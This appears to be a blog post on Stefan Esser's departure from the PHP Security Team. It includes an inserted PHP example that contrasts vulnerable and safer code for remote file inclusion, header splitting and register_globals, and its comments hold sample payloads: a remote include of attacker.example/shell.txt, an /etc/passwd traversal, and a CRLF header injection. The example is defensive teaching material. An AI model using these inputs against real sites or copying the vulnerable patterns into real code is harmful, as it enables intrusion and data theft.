In the last few days there has been a big discussion in the PHP community about Stefan Esser’s retirement from the PHP Security Team. He states that changing PHP’s security from the inside is futile, as Slashdot quoted him. Stefan has found a lot of serious security holes in diverse software projects over the years, and he seems to be one of the most skilled security researchers who continually audit free software, which is always a good thing. He criticises that fixing security holes in PHP takes too long and that he is treated as a persona non grata because he also blames PHP’s design problems, not just application bugs.
Over the last years Stefan has constantly put his finger on the wound: PHP comes with a bunch of features that make it easy for beginners to blow off their whole leg when writing PHP programs, or when they are inexperienced in configuring their PHP environment in a sane way. From remote file inclusion, which is probably the top seller among remote exploits in PHP projects, via header-splitting attacks, to register_globals, he insists that not everything is the application developer’s responsibility. He has also done research in PHP’s »deep shit«, e.g. memory management. He is one of the authors of Hardened-PHP, a patch to make a PHP installation more robust, and of Suhosin, which aims at the same target while being binary compatible with vanilla PHP, which the hardened patch was not. I use the Suhosin extension and, although I really do not agree with its way too low defaults, I like the extension.
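As an added illustration of the three pitfalls named above, here is example code written for this page (not Stefan’s, Hardened-PHP’s or Suhosin’s code), showing the vulnerable pattern next to a safer form of each. It assumes a hypothetical pages/ directory next to the script and the query parameters page and url; the php.ini directives are listed as comments because the point is precisely that the application code has to hold up even when the interpreter defaults are lax.

```php
<?php
// Added example, not code from the original post or from Hardened-PHP/Suhosin.
// Assumed layout: this script lives beside a pages/ directory holding
// home.php, about.php and contact.php (hypothetical).
//
// Interpreter-side defaults that matter here (php.ini):
//   allow_url_fopen   = Off   ; On by default; lets include() open http:// URLs
//   allow_url_include = Off   ; separate switch that exists since PHP 5.2
//   register_globals  = Off   ; On by default before 4.2, removed in 5.4
// The application-side checks below must hold even if an admin leaves these On.

// 1. Remote file inclusion ---------------------------------------------------
// Vulnerable: ?page=http://attacker.example/shell.txt is fetched and executed
// when allow_url_fopen/allow_url_include are On; ?page=../../../etc/passwd%00
// read arbitrary local files on releases that still honoured the null byte.
function render_page_vulnerable()
{
    $page = isset($_GET['page']) ? $_GET['page'] : 'home';
    include $page . '.php';
}

// Safer: the request only selects an entry of an allow-list; the path itself
// is built from constants, so neither URLs nor traversal sequences reach include().
function render_page_safe()
{
    $allowed = array('home', 'about', 'contact');
    $page = isset($_GET['page']) ? $_GET['page'] : 'home';
    if (!in_array($page, $allowed, true)) {
        header('HTTP/1.0 404 Not Found');
        exit('unknown page');
    }
    include dirname(__FILE__) . '/pages/' . $page . '.php';
}

// 2. HTTP header splitting ----------------------------------------------------
// Vulnerable: a value such as "/%0d%0aSet-Cookie:%20admin=1" injects a second
// header on older interpreters whose header() did not reject CR/LF.
function redirect_vulnerable()
{
    header('Location: ' . $_GET['url']);
}

// Safer: accept only a plain site-relative path; anything containing control
// characters, a scheme or a host falls back to "/" instead of reaching header().
function redirect_safe()
{
    $url = isset($_GET['url']) ? $_GET['url'] : '/';
    if (!preg_match('#^/[A-Za-z0-9/_\-.?=&]*$#', $url)) {
        $url = '/';
    }
    header('Location: ' . $url);
}

// 3. register_globals ---------------------------------------------------------
// This one bites at file scope: with register_globals=On, ?authorized=1
// pre-populates the global $authorized before any of this code runs.
// Vulnerable pattern (file scope):
//     if (isset($_SESSION['user'])) { $authorized = true; }
//     if ($authorized) { include 'admin.php'; }
// Safer pattern: initialise before use, so the request cannot supply the value.
$authorized = false;
if (isset($_SESSION['user']) && $_SESSION['user'] === 'admin') {
    $authorized = true;
}
```

The first two functions of each pair are the shape Stefan kept pointing at: one line of idiomatic-looking PHP whose safety depends entirely on an interpreter setting the developer may never have seen. The safer variants do not rely on any php.ini value, which is the only posture that survives a hosting provider’s defaults.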
I’m not a PHP insider and cannot assess the different standpoints, but I am a software developer who likes to use PHP for daily work, for fun and for profit. And I care about application- and interpreter-level security. So my interest is in making sure that the best people are working together in the PHP Security Team. Hopefully in a few weeks, when the heat of the discussion has gone, a wise man can bang heads together again. It would be the best thing for the PHP world, and I would like to ask everyone not to make the gap any deeper.